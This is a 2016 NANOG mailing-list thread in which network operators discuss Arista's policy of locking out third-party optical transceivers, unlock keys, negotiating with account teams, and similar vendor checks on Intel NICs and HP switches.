From youssef at 720.fr Thu Aug 18 11:41:07 2016 From: youssef at 720.fr (Youssef Bengelloun-Zahr) Date: Thu, 18 Aug 2016 13:41:07 +0200 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> Hello all, At my actual job, some colleagues bought Arista switches very recently. They asked the question about 3rd party transceivers and their SE told them exactly what has been said before : "we do accept 3rd party transceivers but we don't support them. If you still want to use them willingly, you'll have to sign a discharge paper and we'll provide you with a key to activate on your equipment". That's Arista's official policy regarding 3rd party transceivers. HTH. BR. > On 18 Aug 2016, at 13:29, Dovid Bender wrote: > > And I was about to jump on to the Arista train..... > > Regards, > > Dovid > > -----Original Message----- > From: Stanislaw > Sender: "NANOG" Date: Thu, 18 Aug 2016 13:24:05 > To: nanog list > Subject: Re: Arista unqualified SFP > > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions.
> > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your > customers when they ask for it? > If it is required to sign some papers which declare that I am aware of > all the risks and losing my warranty - I agree with that, lets do it. > Any way what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this > situation. If you have any other questions regarding enabling 3rd party > options in Arista switches, I suggest to contact your local account team > (or sales) for further discussion on this matter. > > > Next, i've tried inserting various QSFP+ DAC cables I have - none of > them has been even detected on the switch, it was acting like nothing > has been inserted. I guess that even if I get the key, most of my > transceivers/DAC (which work like a champ in Juniper or Extreme > switches) cables wouldnt work. > > I'm writing this post to make somebody who considers buying their > switches be aware of what they'd get. Just buy Juniper instead. > > > Stanislaw wrote at 2016-08-17 23:25: >> Hi Tim, >> >> Thanks for your expressive answer. Will try it :) >> >> Tim Jackson wrote 2016-08-17 22:57: >> >>> I'd suggest bitching and moaning at your account team & support until >>> they give you the key to unlock them.. >>> >>> -- >>> Tim >>> >>>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >>>> >>>> Hi all, >>>> Is there a way for unlocking off-brand transceivers usage on Arista >>>> switches? >>>> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>>> been found out that Arista switches seem to not have possibility to >>>> unlock off-brand xcievers usage (by some service command or so).
>>>> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>>> checking function bypass the actual check and it helped: ports are >>>> not in errdisable state anymore. But despite of xceivers are detected >>>> correctly, links aren't coming up (they are in notconnect state). >>>> >>>> If anyone possibly have does have a sacred knowledge of bringing >>>> off-branded transceivers to life on Arista switches, your help'd be >>>> very appreciated. Thanks. From mark.tinka at seacom.mu Thu Aug 18 11:46:55 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 13:46:55 +0200 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> On 18/Aug/16 13:29, Dovid Bender wrote: > And I was about to jump on to the Arista train..... Your AM team will gladly unlock this for you. This is probably just a procedural issue with Arista TAC not knowing the secret sauce. Mark. From denys at visp.net.lb Thu Aug 18 11:47:00 2016 From: denys at visp.net.lb (Denys Fedoryshchenko) Date: Thu, 18 Aug 2016 14:47:00 +0300 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <3f3e2f6d286b7c952fa5364664d0e822@nuclearcat.com> Same here, i was considering Arista, because they are quite cost effective,feature rich, interesting hardware for developing some custom solutions. But no more, after reading about unreasonable vendor lock-in. 
But such inflexibility are very bad sign, this "openness" looks like marketing only, under the hood it seems worse than other solutions on market. Also when support shows such inflexibility, it is very bad sign. And very sad. On 2016-08-18 14:29, Dovid Bender wrote: > And I was about to jump on to the Arista train..... > > Regards, > > Dovid > > -----Original Message----- > From: Stanislaw > Sender: "NANOG" Date: Thu, 18 Aug 2016 > 13:24:05 > To: nanog list > Subject: Re: Arista unqualified SFP > > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your > customers when they ask for it? > If it is required to sign some papers which declare that I am aware of > all the risks and losing my warranty - I agree with that, lets do it. > Any way what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this > situation. If you have any other questions regarding enabling 3rd party > options in Arista switches, I suggest to contact your local account > team > (or sales) for further discussion on this matter. 
> > > Next, i've tried inserting various QSFP+ DAC cables I have - none of > them has been even detected on the switch, it was acting like nothing > has been inserted. I guess that even if I get the key, most of my > transceivers/DAC (which work like a champ in Juniper or Extreme > switches) cables wouldnt work. > > I'm writing this post to make somebody who considers buying their > switches be aware of what they'd get. Just buy Juniper instead. > > > Stanislaw wrote at 2016-08-17 23:25: >> Hi Tim, >> >> Thanks for your expressive answer. Will try it :) >> >> Tim Jackson wrote 2016-08-17 22:57: >> >>> I'd suggest bitching and moaning at your account team & support until >>> they give you the key to unlock them.. >>> >>> -- >>> Tim >>> >>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >>> >>>> Hi all, >>>> Is there a way for unlocking off-brand transceivers usage on Arista >>>> switches? >>>> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>>> been found out that Arista switches seem to not have possibility to >>>> unlock off-brand xcievers usage (by some service command or so). >>>> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>>> checking function bypass the actual check and it helped: ports are >>>> not in errdisable state anymore. But despite of xceivers are >>>> detected >>>> correctly, links aren't coming up (they are in notconnect state). >>>> >>>> If anyone possibly have does have a sacred knowledge of bringing >>>> off-branded transceivers to life on Arista switches, your help'd be >>>> very appreciated. Thanks. 
From hugge at nordu.net Thu Aug 18 11:47:09 2016 From: hugge at nordu.net (=?UTF-8?Q?Fredrik_Korsb=c3=a4ck?=) Date: Thu, 18 Aug 2016 13:47:09 +0200 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <1374f97a-4549-9fa1-90e9-8b07562ee9ce@nordu.net> On 18/08/16 13:29, Dovid Bender wrote: > And I was about to jump on to the Arista train..... > > Regards, > > Dovid > > -----Original Message----- > From: Stanislaw > Sender: "NANOG" Date: Thu, 18 Aug 2016 13:24:05 > To: nanog list > Subject: Re: Arista unqualified SFP > > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your > customers when they ask for it? > If it is required to sign some papers which declare that I am aware of > all the risks and losing my warranty - I agree with that, lets do it. > Any way what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this > situation. 
If you have any other questions regarding enabling 3rd party > options in Arista switches, I suggest to contact your local account team > (or sales) for further discussion on this matter. > So. Since when does one handle a business-decisions with the TAC? handing out the key means that ANET will not never ever be able to sell you any optics, because that's how it works when you ride on the 3rd party optics train. Also the TAC need to be flagged to ignore non-official transcievers when sending in your issues so they know they don't have to bitch about that. Id suggest you call your SE/TAM instead of TAC for this. Or buy something where you can brand the EEPROM with something more appropriate that a ANET-switch like -- hugge From mark.tinka at seacom.mu Thu Aug 18 11:47:37 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 13:47:37 +0200 Subject: Arista unqualified SFP In-Reply-To: <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> Message-ID: <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> On 18/Aug/16 13:41, Youssef Bengelloun-Zahr wrote: > Hello all, > > At my actual job, some colleagues bought Arista switchs very recently. They asked the question about 3rd party transceivers and their SE told them exactly what has been said before : > > "we do accept 3rd party transceivers but we don't support them. If you still want to use them willingly, you'll have to sign a discharge paper and we'll provide you with a key to activate on your equipement". > > That's Arista's official policy regarding 3rd party transceivers. I am fine with that. All other vendors, explicitly or silently, adopt the same approach. Mark. 
From jackson.tim at gmail.com Thu Aug 18 12:05:30 2016 From: jackson.tim at gmail.com (Tim Jackson) Date: Thu, 18 Aug 2016 07:05:30 -0500 Subject: Arista unqualified SFP In-Reply-To: <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: > > Your AM team will gladly unlock this for you. > > This is probably just a procedural issue with Arista TAC not knowing the > secret sauce. That's not the answer I got at all from Arista: "I understand that Arista TAC indicated that could provide you with a transceiver unlock code. While it is true that the unlock code concept exists, it is very unusual for us to unlock optics on switches. We'd be happy to talk with you further about this in person. " Followup was: "As I'm sure you know, Arista is not the only manufacturer that has made this choice. Unlike our competition, we work to make our optics pricing competitive, but we'll never be as low as the "Taiwan specials" that you see floating around. I have another customer that was flashing white label optics that just made the decision to start using Arista labeled optics again because they were tired of bad quality." They basically said we'll sell you 10x priced optics instead of 100x and we're awesome because we do that. No unlock for you, buy our slightly cheaper OEM optics instead. 
-- Tim From mark.tinka at seacom.mu Thu Aug 18 12:18:47 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 14:18:47 +0200 Subject: Arista unqualified SFP In-Reply-To: <3f3e2f6d286b7c952fa5364664d0e822@nuclearcat.com> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <3f3e2f6d286b7c952fa5364664d0e822@nuclearcat.com> Message-ID: <46eb0437-b7a5-12f9-c357-8dde162e0f46@seacom.mu> On 18/Aug/16 13:47, Denys Fedoryshchenko wrote: > Same here, i was considering Arista, because they are quite cost > effective,feature rich, interesting hardware for developing some > custom solutions. But no more, after reading about unreasonable vendor > lock-in. > But such inflexibility are very bad sign, this "openness" looks like > marketing only, under the hood it seems worse than other solutions on > market. Also when support shows such inflexibility, it is very bad > sign. And very sad. Don't be too hasty. See my response earlier. Mark. From mark.tinka at seacom.mu Thu Aug 18 12:26:34 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 14:26:34 +0200 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: <8a0ea9d4-69fe-b3e4-2167-f1c95788ecd6@seacom.mu> On 18/Aug/16 14:05, Tim Jackson wrote: > That's not the answer I got at all from Arista: > > "I understand that Arista TAC indicated that could provide you > with a transceiver unlock code. While it is true that the unlock code > concept exists, it is very unusual for us to unlock optics on > switches. We'd be happy to talk with you further about this in person. " > > Followup was: > > "As I'm sure you know, Arista is not the only manufacturer that has > made this choice. 
Unlike our competition, we work to make our optics > pricing competitive, but we'll never be as low as the "Taiwan > specials" that you see floating around. I have another customer that > was flashing white label optics that just made the decision to start > using Arista labeled optics again because they were tired of bad quality." > > They basically said we'll sell you 10x priced optics instead of 100x > and we're awesome because we do that. No unlock for you, buy our > slightly cheaper OEM optics instead. So the bottom line is that not all AM's are built the same. Some are nice, some are not. Some are enthusiastic, some are docile. Some are self-motivated, some need a fire lit underneath them. My advice, tell them you'll take your business elsewhere if they don't come to the table. If that does not work, request for another AM. If that doesn't work, escalate to the sales head. If that doesn't work, look for another Arista sales office in some other region. If all that fails, move on to another vendor - although I doubt it will get to that point before someone within Arista is screamed at. Of course, there's always Twitter :-)... Mark. From youssef at 720.fr Thu Aug 18 12:31:29 2016 From: youssef at 720.fr (Youssef Bengelloun-Zahr) Date: Thu, 18 Aug 2016 14:31:29 +0200 Subject: Arista unqualified SFP In-Reply-To: <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: 2016-08-18 13:47 GMT+02:00 Mark Tinka : > > > On 18/Aug/16 13:41, Youssef Bengelloun-Zahr wrote: > > Hello all, > > At my actual job, some colleagues bought Arista switchs very recently. 
They asked the question about 3rd party transceivers and their SE told them exactly what has been said before : > > "we do accept 3rd party transceivers but we don't support them. If you still want to use them willingly, you'll have to sign a discharge paper and we'll provide you with a key to activate on your equipement". > > That's Arista's official policy regarding 3rd party transceivers. > > > I am fine with that. > > All other vendors, explicitly or silently, adopt the same approach. > > Mark. > +1. At least they have a policy that they fully assume publically, which is more than others can say/do. Best regards. -- Youssef BENGELLOUN-ZAHR From swmike at swm.pp.se Thu Aug 18 12:32:55 2016 From: swmike at swm.pp.se (Mikael Abrahamsson) Date: Thu, 18 Aug 2016 14:32:55 +0200 (CEST) Subject: Arista unqualified SFP In-Reply-To: <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? 
-- Mikael Abrahamsson email: swmike at swm.pp.se From nanog at ics-il.net Thu Aug 18 12:41:47 2016 From: nanog at ics-il.net (Mike Hammett) Date: Thu, 18 Aug 2016 07:41:47 -0500 (CDT) Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> Intel does allow DAC of any vendor (assuming they properly identify as DACs. You can also disable Intel's check in the Linux drivers. ----- Mike Hammett Intelligent Computing Solutions Midwest Internet Exchange The Brothers WISP ----- Original Message ----- From: "Mikael Abrahamsson" To: "Mark Tinka" Cc: "nanog list" Sent: Thursday, August 18, 2016 7:32:55 AM Subject: Re: Arista unqualified SFP On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From nick at foobar.org Thu Aug 18 12:42:02 2016 From: nick at foobar.org (Nick Hilliard) Date: Thu, 18 Aug 2016 13:42:02 +0100 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: <57B5AD1A.90408@foobar.org> Tim Jackson wrote: > "As I'm sure you know, Arista is not the only manufacturer that has made > this choice. 
Unlike our competition, we work to make our optics pricing > competitive, but we'll never be as low as the "Taiwan specials" that you > see floating around. I have another customer that was flashing white label > optics that just made the decision to start using Arista labeled optics > again because they were tired of bad quality." > > They basically said we'll sell you 10x priced optics instead of 100x and > we're awesome because we do that. No unlock for you, buy our slightly > cheaper OEM optics instead. Nothing specific to Arista or anything, but this is a terribly frustrating position to be in as a customer, when you want to e.g. use some transceiver which isn't supported by the vendor or connect up Vendor A's switch to Vendor B's switch using a DAC or something. Ultimately one side needs to give in because vendor DACs are coded one way or the other. It is always better to clarify this sort of thing with the account management team before purchasing, and preferably have it in email or writing. After that, the best approach is to ask support and/or account management nicely rather than "bitching and moaning" as someone else suggested - diplomacy is usually a better long term basis for having a good relationship with your vendor. Often it's useful to point out discussions like this which indicate that it's been enabled for other people. 
Nick From mark.tinka at seacom.mu Thu Aug 18 12:45:31 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 14:45:31 +0200 Subject: Arista unqualified SFP In-Reply-To: <57B5AD1A.90408@foobar.org> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> Message-ID: On 18/Aug/16 14:42, Nick Hilliard wrote: > > It is always better to clarify this sort of thing with the account > management team before purchasing, and preferably have it in email or > writing. After that, the best approach is to ask support and/or account > management nicely rather than "bitching and moaning" as someone else > suggested - diplomacy is usually a better long term basis for having a > good relationship with your vendor. Often it's useful to point out > discussions like this which indicate that it's been enabled for other > people. +1. We politely said to Arista, "We like your box, but we're afraid that if we can't use our existing optics, we'd all miss out on a good opportunity working together". That did the job. Mark. From nick at foobar.org Thu Aug 18 12:46:28 2016 From: nick at foobar.org (Nick Hilliard) Date: Thu, 18 Aug 2016 13:46:28 +0100 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: <57B5AE24.6030404@foobar.org> Mikael Abrahamsson wrote: > Any pointers to how to turn this of on Intel NICs and HP switches? Yes: don't buy Intel NICs or HP switches. Problem solved. 
Nick From denys at visp.net.lb Thu Aug 18 12:51:13 2016 From: denys at visp.net.lb (Denys Fedoryshchenko) Date: Thu, 18 Aug 2016 15:51:13 +0300 Subject: Arista unqualified SFP In-Reply-To: <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> Message-ID: Not a case with Intel X*710 new chipset, check is in firmware. Someone hacked it, but ... On 2016-08-18 15:41, Mike Hammett wrote: > Intel does allow DAC of any vendor (assuming they properly identify as > DACs. You can also disable Intel's check in the Linux drivers. > > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > ----- Original Message ----- > > From: "Mikael Abrahamsson" > To: "Mark Tinka" > Cc: "nanog list" > Sent: Thursday, August 18, 2016 7:32:55 AM > Subject: Re: Arista unqualified SFP > > On Thu, 18 Aug 2016, Mark Tinka wrote: > >> All other vendors, explicitly or silently, adopt the same approach. > > I've heard from people running Intel NICs and HP switches, that this > can't > be turned off there. You run into very interesting problems when you're > trying to use DAC cables between multi vendor. > > Any pointers to how to turn this of on Intel NICs and HP switches? 
From nanog at ics-il.net Thu Aug 18 12:55:23 2016 From: nanog at ics-il.net (Mike Hammett) Date: Thu, 18 Aug 2016 07:55:23 -0500 (CDT) Subject: Arista unqualified SFP In-Reply-To: References: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> Message-ID: <1335340996.4585.1471524919146.JavaMail.mhammett@ThunderFuck> https://sourceforge.net/p/e1000/mailman/message/28698959/ That or similar doesn't work for that model? ----- Mike Hammett Intelligent Computing Solutions Midwest Internet Exchange The Brothers WISP ----- Original Message ----- From: "Denys Fedoryshchenko" To: "Mike Hammett" Cc: "NANOG Mailing List" Sent: Thursday, August 18, 2016 7:51:13 AM Subject: Re: Arista unqualified SFP Not a case with Intel X*710 new chipset, check is in firmware. Someone hacked it, but ... On 2016-08-18 15:41, Mike Hammett wrote: > Intel does allow DAC of any vendor (assuming they properly identify as > DACs. You can also disable Intel's check in the Linux drivers. > > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > ----- Original Message ----- > > From: "Mikael Abrahamsson" > To: "Mark Tinka" > Cc: "nanog list" > Sent: Thursday, August 18, 2016 7:32:55 AM > Subject: Re: Arista unqualified SFP > > On Thu, 18 Aug 2016, Mark Tinka wrote: > >> All other vendors, explicitly or silently, adopt the same approach. > > I've heard from people running Intel NICs and HP switches, that this > can't > be turned off there. You run into very interesting problems when you're > trying to use DAC cables between multi vendor. > > Any pointers to how to turn this of on Intel NICs and HP switches? 
From hugge at nordu.net Thu Aug 18 13:01:57 2016 From: hugge at nordu.net (=?UTF-8?Q?Fredrik_Korsb=c3=a4ck?=) Date: Thu, 18 Aug 2016 15:01:57 +0200 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> Message-ID: <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> On 18/08/16 14:45, Mark Tinka wrote: > > > On 18/Aug/16 14:42, Nick Hilliard wrote: > >> >> It is always better to clarify this sort of thing with the account >> management team before purchasing, and preferably have it in email or >> writing. After that, the best approach is to ask support and/or account >> management nicely rather than "bitching and moaning" as someone else >> suggested - diplomacy is usually a better long term basis for having a >> good relationship with your vendor. Often it's useful to point out >> discussions like this which indicate that it's been enabled for other >> people. > > +1. > > We politely said to Arista, "We like your box, but we're afraid that if > we can't use our existing optics, we'd all miss out on a good > opportunity working together". > > That did the job. > > Mark. > I think someone from Arista said... "We are never going to lose an affair due to not supporting 3-d party optics, but we will try to convince the customer to buy our stuff, since that's what we do, we sell stuff". In these cheap arista switches, filling them with optics (if the optics is from ANET themselves) is usually the same cost as buying like five switches, so of course they want a share of that and they will try to convince you that 3rd party optics will make the switch go up in flames etc etc. So its kinda easy... just present three choices. 1. Arista Switch + Arista Optics (at the same price as your favourite 3rd party vendor) 2. Arista Switch + 3rd party optics 3. 
No Arista switch. I know which one you are gonna get. -- hugge From denys at visp.net.lb Thu Aug 18 13:19:14 2016 From: denys at visp.net.lb (Denys Fedoryshchenko) Date: Thu, 18 Aug 2016 16:19:14 +0300 Subject: Arista unqualified SFP In-Reply-To: <1335340996.4585.1471524919146.JavaMail.mhammett@ThunderFuck> References: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> <1335340996.4585.1471524919146.JavaMail.mhammett@ThunderFuck> Message-ID: <753efaac4d182cdbab872068956e3083@nuclearcat.com> No, this driver patch (or similar) wont work on new model. But honestly, on my experience, X520 perform still better than 710 series on 10G links. https://sourceforge.net/p/e1000/mailman/message/34991760/ From: Wesley W. Terpstra - 2016-04-03 14:03:52 He did unlocked by modifying NVM in card(and i guess losing warranty, for sure) Somehow it is even better, because X520 needed modification of driver, and that is not possible on "blackbox" software solutions using them. On 2016-08-18 15:55, Mike Hammett wrote: > https://sourceforge.net/p/e1000/mailman/message/28698959/ > > That or similar doesn't work for that model? > > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > ----- Original Message ----- > > From: "Denys Fedoryshchenko" > To: "Mike Hammett" > Cc: "NANOG Mailing List" > Sent: Thursday, August 18, 2016 7:51:13 AM > Subject: Re: Arista unqualified SFP > > Not a case with Intel X*710 new chipset, check is in firmware. > Someone hacked it, but ... > > On 2016-08-18 15:41, Mike Hammett wrote: >> Intel does allow DAC of any vendor (assuming they properly identify as >> DACs. You can also disable Intel's check in the Linux drivers. 
>> >> >> >> >> ----- >> Mike Hammett >> Intelligent Computing Solutions >> >> Midwest Internet Exchange >> >> The Brothers WISP >> >> ----- Original Message ----- >> >> From: "Mikael Abrahamsson" >> To: "Mark Tinka" >> Cc: "nanog list" >> Sent: Thursday, August 18, 2016 7:32:55 AM >> Subject: Re: Arista unqualified SFP >> >> On Thu, 18 Aug 2016, Mark Tinka wrote: >> >>> All other vendors, explicitly or silently, adopt the same approach. >> >> I've heard from people running Intel NICs and HP switches, that this >> can't >> be turned off there. You run into very interesting problems when >> you're >> trying to use DAC cables between multi vendor. >> >> Any pointers to how to turn this of on Intel NICs and HP switches? From ryan.dirocco at totalserversolutions.com Thu Aug 18 13:49:14 2016 From: ryan.dirocco at totalserversolutions.com (Ryan DiRocco) Date: Thu, 18 Aug 2016 13:49:14 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: If you are running Intel NIC(s) such as the X520-DA2 with 3rd party optics for something like DWDM, there are driver option flags for linux/windows, etc to permit the use of the optics. In deployments we've used various branded dac cables to connect Intel branded nics to cisco/arista/brocade, without issue. As with any vendor, there is a work around procedure. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mikael Abrahamsson Sent: Thursday, August 18, 2016 8:33 AM To: Mark Tinka Cc: nanog list Subject: Re: Arista unqualified SFP On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. 
